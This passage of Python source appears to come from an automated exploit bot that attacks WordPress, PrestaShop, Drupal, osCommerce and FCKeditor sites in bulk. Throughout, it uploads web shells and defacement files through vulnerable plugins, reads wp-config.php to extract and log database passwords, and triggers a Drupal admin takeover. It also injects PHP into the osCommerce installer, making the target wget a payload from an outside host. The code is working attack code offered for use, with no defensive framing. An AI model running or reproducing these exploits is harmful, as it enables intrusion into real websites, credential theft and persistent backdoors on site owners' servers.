self.Print_Vuln_index(
site + '/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/pwn.gif')
with open('result/Index_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
self.Revslider_Config(site)
else:
self.Revslider_Config(site)
elif '/wp-content/themes/rarebird/' in CheckRevslider.text.encode('utf-8'):
requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
CheckRev11 = requests.get('http://' + site +
'/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
if 'GIF89a' in CheckRev11.text.encode('utf-8'):
ShellCheck = requests.get('http://' + site +
'/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
self.Print_vuln_Shell(
site + '/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
self.Print_Vuln_index(
site + '/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/pwn.gif')
with open('result/Index_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
self.Revslider_Config(site)
else:
self.Revslider_Config(site)
elif '/wp-content/themes/Avada/' in CheckRevslider.text.encode('utf-8'):
requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
CheckRev12 = requests.get('http://' + site +
'/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
if 'GIF89a' in CheckRev12.text.encode('utf-8'):
ShellCheck = requests.get('http://' + site +
'/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
self.Print_vuln_Shell(
site + '/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
self.Print_Vuln_index(
site + '/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/pwn.gif')
with open('result/Index_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
self.Revslider_Config(site)
else:
self.Revslider_Config(site)
else:
self.Print_NotVuln('revslider', site)
except:
self.Print_NotVuln('revslider', site)
def Revslider_Config(self, site):
try:
Exp = 'http://' + site + \
'/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
GetConfig = requests.get(Exp, timeout=5)
if 'DB_PASSWORD' in GetConfig.text.encode('utf-8'):
self.Print_vuln_Config(site)
with open('result/Config_results.txt', 'a') as ww:
ww.write('Full Config Path : ' + Exp + '\n')
try:
Gethost = re.findall("'DB_HOST', '(.*)'", GetConfig.text.encode('utf-8'))
Getuser = re.findall("'DB_USER', '(.*)'", GetConfig.text.encode('utf-8'))
Getpass = re.findall("'DB_PASSWORD', '(.*)'", GetConfig.text.encode('utf-8'))
Getdb = re.findall("'DB_NAME', '(.*)'", GetConfig.text.encode('utf-8'))
with open('result/Config_results.txt', 'a') as ww:
ww.write(' Host: ' + Gethost[0] + '\n' + ' user: ' + Getuser[0] +
'\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
0] + '\n---------------------\n')
self.Revslider_css(site)
except:
self.Revslider_css(site)
else:
self.Revslider_css(site)
except:
self.Revslider_css(site)
def viral_optins(self, site):
try:
defaceFile = {
'Filedata': ('vuln.txt', open(self.TextindeX, 'rb'), 'text/html')
}
x = requests.post('http://' + site + '/wp-content/plugins/viral-optins/api/uploader/file-uploader.php',
files=defaceFile, timeout=5)
if 'id="wpvimgres"' in x.text.encode('utf-8'):
uploader = site + '/wp-content/uploads/20' + self.year + '/' + self.month + '/vuln.txt'
GoT = requests.get('http://' + uploader, timeout=5)
find = re.findall('<img src="http://(.*)" height="', x.text.encode('utf-8'))
GoT2 = requests.get('http://' + find[0], timeout=5)
print find[0]
if 'Vuln!!' in GoT.text.encode('utf-8'):
self.Print_Vuln_index(site + '/wp-content/uploads/20' + self.year + '/' + self.month + '/vuln.txt')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/wp-content/uploads/20' + self.year + '/' + self.month + '/vuln.txt' + '\n')
elif 'Vuln!!' in GoT2.text.encode('utf-8'):
self.Print_Vuln_index(find[0])
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + find[0] + '\n')
else:
self.Print_NotVuln('viral optins', site)
else:
self.Print_NotVuln('viral optins', site)
except:
self.Print_NotVuln('viral optins', site)
def Woocomrece(self, site):
try:
Exp = 'http://' + site + '/wp-admin/admin-ajax.php'
Postdata = {'action': 'nm_personalizedproduct_upload_file', 'name': 'upload.php'}
FileData = {'file': (self.pagelinesExploitShell.split('/')[1], open(self.pagelinesExploitShell, 'rb'),
'multipart/form-data')}
GoT = requests.post(Exp, files=FileData, data=Postdata, timeout=5)
if GoT.status_code == 200 or 'success' in GoT.text.encode('utf-8'):
UploadPostPath = 'http://' + site + '/wp-content/uploads/product_files/upload.php'
CheckShell = requests.get(UploadPostPath, timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
shellChecker = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
if 'Vuln!!' in shellChecker.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/wp-content/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/wp-content/vuln.php' + '\n')
IndexCheck = requests.get('http://' + site + '/vuln.htm', timeout=5)
if 'Vuln!!' in IndexCheck.text.encode('utf-8'):
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
else:
self.Print_NotVuln('Woocomrece', site)
else:
self.Print_NotVuln('Woocomrece', site)
else:
self.Print_NotVuln('Woocomrece', site)
except:
self.Print_NotVuln('Woocomrece', site)
def FckPath(self, zzz):
try:
find = re.findall(',"(.*)","', zzz)
path = find[0].strip()
return path
except:
pass
def FckEditor(self, site):
try:
exp2 = '/fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media'
try:
CheckVuln = requests.get('http://' + site + exp2, timeout=5)
if 'OnUploadCompleted(202' in CheckVuln.text.encode('utf-8'):
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0',
'Accept': '*/*'}
exp = 'http://' + site + exp2
po = {'Content_Type': 'form-data'}
fil = {'NewFile': open(self.Jce_Deface_image, 'rb')}
rr = requests.post(exp, data=po, headers=headers, timeout=10, files=fil)
if '.gif' in rr.text.encode('utf-8'):
zart = self.FckPath(rr.text.encode('utf-8'))
x = 'http://' + site + str(zart)
wcheck2 = requests.get(x, timeout=5)
if wcheck2.status_code == 200:
check_deface = requests.get(x, timeout=10)
if 'GIF89a' in check_deface.text.encode('utf-8'):
self.Print_Vuln_index(site + str(zart))
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + str(zart) + '\n')
else:
self.Print_NotVuln('fckeditor', site)
else:
self.Print_NotVuln('fckeditor', site)
else:
self.Print_NotVuln('fckeditor', site)
else:
self.Print_NotVuln('fckeditor', site)
except:
self.Print_NotVuln('fckeditor', site)
except:
self.Print_NotVuln('fckeditor', site)
def Drupal_Sqli_Addadmin(self, site):
os.system('python files/adminTakeoverdupal.py -t http://' + site + ' -u pwndrupal -p pwndrupal')
def osCommerce(self, site):
try:
CheckVuln = requests.get('http://' + site + '/install/index.php', timeout=5)
if 'Welcome to osCommerce' in CheckVuln.text.encode('utf-8') or CheckVuln.status_code == 200:
Exp = site + '/install/install.php?step=4'
data = {
'DIR_FS_DOCUMENT_ROOT': './'
}
shell = '\');'
shell += 'system("wget https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/OsComPayLoad.php");'
shell += '/*'
deface = '\');'
deface += 'system("echo Vuln!! patch it Now!> ../../vuln.htm");'
deface += '/*'
data['DB_DATABASE'] = deface
r = requests.post(url='http://' + Exp, data=data, timeout=5)
if r.status_code == 200:
requests.get('http://' + site + '/install/includes/configure.php', timeout=5)
CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.txt' + '\n')
try:
data['DB_DATABASE'] = shell
requests.post(url='http://' + Exp, data=data, timeout=5)
requests.get('http://' + site + '/install/includes/configure.php', timeout=5)
requests.get('http://' + site + '/install/includes/OsComPayLoad.php', timeout=5)
Checkshell = requests.get('http://' + site + '/install/includes/vuln.php', timeout=5)
if 'Vuln!!' in Checkshell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/wp-content/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/wp-content/vuln.php' + '\n')
except:
pass
else:
self.Print_NotVuln('osCommerce RCE', site)
else:
self.Print_NotVuln('osCommerce RCE', site)
else:
self.Print_NotVuln('osCommerce RCE', site)
except:
self.Print_NotVuln('osCommerce RCE', site)
def columnadverts(self, site):
try:
Exp = site + '/modules/columnadverts/uploadimage.php'
FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
if 'success' in GoT.text.encode('utf-8'):
IndexPath = '/modules/columnadverts/slides/' + self.Jce_Deface_image.split('/')[1]
CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(IndexPath)
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
requests.post('http://' + Exp, files=FileDataShell, timeout=5)
ShellPath = '/modules/columnadverts/slides/' + self.ShellPresta.split('/')[1]
CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(site + ShellPath)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + ShellPath + '\n')
else:
self.Print_NotVuln('columnadverts', site)
else:
self.Print_NotVuln('columnadverts', site)
except:
self.Print_NotVuln('columnadverts', site)
def soopamobile(self, site):
try:
Exp = site + '/modules/soopamobile/uploadimage.php'
FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
if 'success' in GoT.text.encode('utf-8'):
IndexPath = '/modules/soopamobile/slides/' + self.Jce_Deface_image.split('/')[1]
CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(IndexPath)
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
requests.post('http://' + Exp, files=FileDataShell, timeout=5)
ShellPath = '/modules/soopamobile/slides/' + self.ShellPresta.split('/')[1]
CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(ShellPath)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(ShellPath + '\n')
else:
self.Print_NotVuln('soopamobile', site)
else:
self.Print_NotVuln('soopamobile', site)
except:
self.Print_NotVuln('soopamobile', site)
def soopabanners(self, site):
try:
Exp = site + '/modules/soopabanners/uploadimage.php'
FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
if 'success' in GoT.text.encode('utf-8'):
IndexPath = '/modules/soopabanners/slides/' + self.Jce_Deface_image.split('/')[1]
CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(IndexPath)
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
requests.post('http://' + Exp, files=FileDataShell, timeout=5)
ShellPath = '/modules/soopabanners/slides/' + self.ShellPresta.split('/')[1]
CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(ShellPath)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(ShellPath + '\n')
else:
self.Print_NotVuln('soopabanners', site)
else:
self.Print_NotVuln('soopabanners', site)
except:
self.Print_NotVuln('soopabanners', site)
def vtermslideshow(self, site):
try:
Exp = site + '/modules/vtermslideshow/uploadimage.php'
FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
if 'success' in GoT.text.encode('utf-8'):
IndexPath = '/modules/vtermslideshow/slides/' + self.Jce_Deface_image.split('/')[1]
CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(IndexPath)
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
requests.post('http://' + Exp, files=FileDataShell, timeout=5)
ShellPath = '/modules/vtermslideshow/slides/' + self.ShellPresta.split('/')[1]
CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(ShellPath)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(ShellPath + '\n')
else:
self.Print_NotVuln('vtermslideshow', site)
else:
self.Print_NotVuln('vtermslideshow', site)
except:
self.Print_NotVuln('vtermslideshow', site)
def simpleslideshow(self, site):
try:
Exp = site + '/modules/simpleslideshow/uploadimage.php'
FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
if 'success' in GoT.text.encode('utf-8'):
IndexPath = '/modules/simpleslideshow/slides/' + self.Jce_Deface_image.split('/')[1]
CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(IndexPath)
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
requests.post('http://' + Exp, files=FileDataShell, timeout=5)
ShellPath = '/modules/simpleslideshow/slides/' + self.ShellPresta.split('/')[1]
CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(ShellPath)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(ShellPath + '\n')
else:
self.Print_NotVuln('simpleslideshow', site)
else:
self.Print_NotVuln('simpleslideshow', site)
except:
self.Print_NotVuln('simpleslideshow', site)
def productpageadverts(self, site):
try:
Exp = site + '/modules/productpageadverts/uploadimage.php'
FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
if 'success' in GoT.text.encode('utf-8'):
IndexPath = '/modules/productpageadverts/slides/' + self.Jce_Deface_image.split('/')[1]
CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(IndexPath)
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
requests.post('http://' + Exp, files=FileDataShell, timeout=5)
ShellPath = '/modules/productpageadverts/slides/' + self.ShellPresta.split('/')[1]
CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(ShellPath)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(ShellPath + '\n')
else:
self.Print_NotVuln('productpageadverts', site)
else:
self.Print_NotVuln('productpageadverts', site)
except:
self.Print_NotVuln('productpageadverts', site)
def homepageadvertise(self, site):
try:
Exp = site + '/modules/homepageadvertise/uploadimage.php'
FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
if 'success' in GoT.text.encode('utf-8'):
IndexPath = '/modules/homepageadvertise/slides/' + self.Jce_Deface_image.split('/')[1]
CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(IndexPath)
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
requests.post('http://' + Exp, files=FileDataShell, timeout=5)
ShellPath = '/modules/homepageadvertise/slides/' + self.ShellPresta.split('/')[1]
CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(ShellPath)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(ShellPath + '\n')
else:
self.Print_NotVuln('homepageadvertise', site)
else:
self.Print_NotVuln('homepageadvertise', site)
except:
self.Print_NotVuln('homepageadvertise', site)
def homepageadvertise2(self, site):
try:
Exp = site + '/modules/homepageadvertise2/uploadimage.php'
FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
if 'success' in GoT.text.encode('utf-8'):
IndexPath = '/modules/homepageadvertise2/slides/' + self.Jce_Deface_image.split('/')[1]
CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(IndexPath)
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
requests.post('http://' + Exp, files=FileDataShell, timeout=5)
ShellPath = '/modules/homepageadvertise2/slides/' + self.ShellPresta.split('/')[1]
CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(ShellPath)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(ShellPath + '\n')
else:
self.Print_NotVuln('homepageadvertise2', site)
else:
self.Print_NotVuln('homepageadvertise2', site)
except:
self.Print_NotVuln('homepageadvertise2', site)
def jro_homepageadvertise(self, site):
try:
Exp = site + '/modules/jro_homepageadvertise/uploadimage.php'
FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
if 'success' in GoT.text.encode('utf-8'):
IndexPath = '/modules/jro_homepageadvertise/slides/' + self.Jce_Deface_image.split('/')[1]
CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(IndexPath)
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
requests.post('http://' + Exp, files=FileDataShell, timeout=5)
ShellPath = '/modules/jro_homepageadvertise/slides/' + self.ShellPresta.split('/')[1]
CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(ShellPath)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(ShellPath + '\n')
else:
self.Print_NotVuln('jro_homepageadvertise', site)
else:
self.Print_NotVuln('jro_homepageadvertise', site)
except:
self.Print_NotVuln('jro_homepageadvertise', site)
def attributewizardpro(self, site):
try:
Exp = site + '/modules/attributewizardpro/file_upload.php'
FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
if self.Jce_Deface_image.split('/')[1] in GoT.text.encode('utf-8'):
Index = GoT.text.encode('utf-8').split('|||')[0]
print Index
IndexPath = site + '/modules/attributewizardpro/file_uploads/' + Index
CheckIndex = requests.get('http://' + IndexPath, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(IndexPath)
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
Got2 = requests.post('http://' + Exp, files=FileDataShell, timeout=5)
if self.ShellPresta.split('/')[1] in GoT.text.encode('utf-8'):
Shell = Got2.text.encode('utf-8').split('|||')[0]
ShellPath = site + '/modules/attributewizardpro/file_uploads/' + Shell
CheckShell = requests.get('http://' + ShellPath, timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(ShellPath)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(ShellPath + '\n')
else:
self.Print_NotVuln('attributewizardpro', site)
else:
self.Print_NotVuln('attributewizardpro', site)
except:
self.Print_NotVuln('attributewizardpro', site)
def attributewizardpro2(self, site):
try:
Exp = site + '/modules/1attributewizardpro/file_upload.php'
FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
if self.Jce_Deface_image.split('/')[1] in GoT.text.encode('utf-8'):
Index = GoT.text.encode('utf-8').split('|||')[0]
print Index
IndexPath = site + '/modules/1attributewizardpro/file_uploads/' + Index
CheckIndex = requests.get('http://' + IndexPath, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(IndexPath)
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
Got2 = requests.post('http://' + Exp, files=FileDataShell, timeout=5)
if self.ShellPresta.split('/')[1] in GoT.text.encode('utf-8'):
Shell = Got2.text.encode('utf-8').split('|||')[0]
ShellPath = site + '/modules/1attributewizardpro/file_uploads/' + Shell
CheckShell = requests.get('http://' + ShellPath, timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(ShellPath)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(ShellPath + '\n')
else:
self.Print_NotVuln('1attributewizardpro', site)
else:
self.Print_NotVuln('1attributewizardpro', site)
except:
self.Print_NotVuln('1attributewizardpro', site)
def attributewizardpro3(self, site):
try:
Exp = site + '/modules/attributewizardpro.OLD/file_upload.php'
FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
if self.Jce_Deface_image.split('/')[1] in GoT.text.encode('utf-8'):
Index = GoT.text.encode('utf-8').split('|||')[0]
print Index
IndexPath = site + '/modules/attributewizardpro.OLD/file_uploads/' + Index
CheckIndex = requests.get('http://' + IndexPath, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(IndexPath)
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
Got2 = requests.post('http://' + Exp, files=FileDataShell, timeout=5)
if self.ShellPresta.split('/')[1] in GoT.text.encode('utf-8'):
Shell = Got2.text.encode('utf-8').split('|||')[0]
ShellPath = site + '/modules/attributewizardpro.OLD/file_uploads/' + Shell
CheckShell = requests.get('http://' + ShellPath, timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(ShellPath)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(ShellPath + '\n')
else:
self.Print_NotVuln('attributewizardpro.OLD', site)
else:
self.Print_NotVuln('attributewizardpro.OLD', site)
except:
self.Print_NotVuln('attributewizardpro.OLD', site)
def attributewizardpro_x(self, site):
try:
Exp = site + '/modules/attributewizardpro_x/file_upload.php'
FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
if self.Jce_Deface_image.split('/')[1] in GoT.text.encode('utf-8'):
Index = GoT.text.encode('utf-8').split('|||')[0]
print Index
IndexPath = site + '/modules/attributewizardpro_x/file_uploads/' + Index
CheckIndex = requests.get('http://' + IndexPath, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(IndexPath)
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
Got2 = requests.post('http://' + Exp, files=FileDataShell, timeout=5)
if self.ShellPresta.split('/')[1] in GoT.text.encode('utf-8'):
Shell = Got2.text.encode('utf-8').split('|||')[0]
ShellPath = site + '/modules/attributewizardpro_x/file_uploads/' + Shell
CheckShell = requests.get('http://' + ShellPath, timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(ShellPath)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(ShellPath + '\n')
else:
self.Print_NotVuln('attributewizardpro_x', site)
else:
self.Print_NotVuln('attributewizardpro_x', site)
except:
self.Print_NotVuln('attributewizardpro_x', site)
def advancedslider(self, site):
try:
Exp = site + '/modules/advancedslider/ajax_advancedsliderUpload.php?action=submitUploadImage%26id_slide=php'
Checkvuln = requests.get('http://' + Exp, timeout=5)
FileDataIndex = {'qqfile': open(self.Jce_Deface_image, 'rb')}
if Checkvuln.status_code == 200:
requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
IndexPath = site + '/modules/advancedslider/uploads/' + self.Jce_Deface_image.split('/')[1]
CheckIndex = requests.get('http://' + IndexPath, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(IndexPath)
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
else:
self.Print_NotVuln('advancedslider', site)
else:
self.Print_NotVuln('advancedslider', site)
except:
self.Print_NotVuln('advancedslider', site)
def cartabandonmentpro(self, site):
try:
Exp = site + '/modules/cartabandonmentpro/upload.php'
Checkvuln = requests.get('http://' + Exp, timeout=5)
FileDataIndex = {'image': open(self.Jce_Deface_image, 'rb')}
if Checkvuln.status_code == 200:
requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
IndexPath = site + '/modules/cartabandonmentpro/uploads/' + self.Jce_Deface_image.split('/')[1]
CheckIndex = requests.get('http://' + IndexPath, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(IndexPath)
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
else:
self.Print_NotVuln('cartabandonmentpro', site)
else:
self.Print_NotVuln('cartabandonmentpro', site)
except:
self.Print_NotVuln('cartabandonmentpro', site)
def cartabandonmentproOld(self, site):
try:
Exp = site + '/modules/cartabandonmentproOld/upload.php'
Checkvuln = requests.get('http://' + Exp, timeout=5)
FileDataIndex = {'image': open(self.Jce_Deface_image, 'rb')}
if Checkvuln.status_code == 200:
requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
IndexPath = site + '/modules/cartabandonmentproOld/uploads/' + self.Jce_Deface_image.split('/')[1]
CheckIndex = requests.get('http://' + IndexPath, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(IndexPath)
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
else:
self.Print_NotVuln('cartabandonmentproOld', site)
else:
self.Print_NotVuln('cartabandonmentproOld', site)
except:
self.Print_NotVuln('cartabandonmentproOld', site)
def videostab(self, site):
try:
Exp = site + '/modules/videostab/ajax_videostab.php?action=submitUploadVideo%26id_product=upload'
Checkvuln = requests.get('http://' + Exp, timeout=5)
FileDataIndex = {'qqfile': open(self.Jce_Deface_image, 'rb')}
if Checkvuln.status_code == 200:
requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
IndexPath = site + '/modules/videostab/uploads/' + self.Jce_Deface_image.split('/')[1]
CheckIndex = requests.get('http://' + IndexPath, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(IndexPath)
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
else:
self.Print_NotVuln('videostab', site)
else:
self.Print_NotVuln('videostab', site)
except:
self.Print_NotVuln('videostab', site)
def wg24themeadministration(self, site):
Exl = site + '/modules/wg24themeadministration/wg24_ajax.php'
try:
Checkvuln = requests.get('http://' + Exl, timeout=5)
if Checkvuln.status_code == 200:
PostData = {'data': 'bajatax',
'type': 'pattern_upload'}
FileDataIndex = {'bajatax': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'bajatax': open(self.ShellPresta, 'rb')}
uploadedPathIndex = site + '/modules/wg24themeadministration/img/upload/' + self.Jce_Deface_image.split('/')[1]
uploadedPathShell = site + '/modules/wg24themeadministration/img/upload/' + self.ShellPresta.split('/')[1]
requests.post('http://' + Exl, files=FileDataIndex, data=PostData, timeout=5)
CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(uploadedPathIndex)
with open('result/Index_results.txt', 'a') as writer:
writer.write(uploadedPathIndex + '\n')
requests.post('http://' + Exl, files=FileDataShell, data=PostData, timeout=5)
Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
if 'Vuln!!' in Checkshell.text.encode('utf-8'):
self.Print_vuln_Shell(uploadedPathShell)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(uploadedPathShell + '\n')
else:
